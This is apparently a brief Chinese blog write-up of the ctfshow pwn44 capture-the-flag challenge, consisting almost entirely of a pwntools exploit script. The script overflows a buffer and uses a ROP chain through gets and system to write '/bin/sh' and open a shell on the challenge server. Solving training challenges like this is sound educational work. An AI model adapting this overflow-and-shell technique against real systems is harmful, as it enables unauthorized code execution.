ctfshow pwn44

高考完了高三一年都没怎么碰CTF有点生疏了，现在ctfshow的pwn入门系列持续更新。
pwn44之前的以前都做了就懒得重新做了，直接重pwn44开始。
太懒了就直接贴代码，重要的知识点我会写出来。

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28197)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

buf = 0x602080
system_addr = 0x400520
gets_addr =  0x400530
pop_rdi = 0x00000000004007f3

paylaod = b"a"*(0xa+8)+p64(pop_rdi)+p64(buf)+p64(gets_addr)+p64(pop_rdi)+p64(buf)+p64(system_addr)
ru("get system parameter!")
sl(paylaod)
sl(b"/bin/sh")


itr()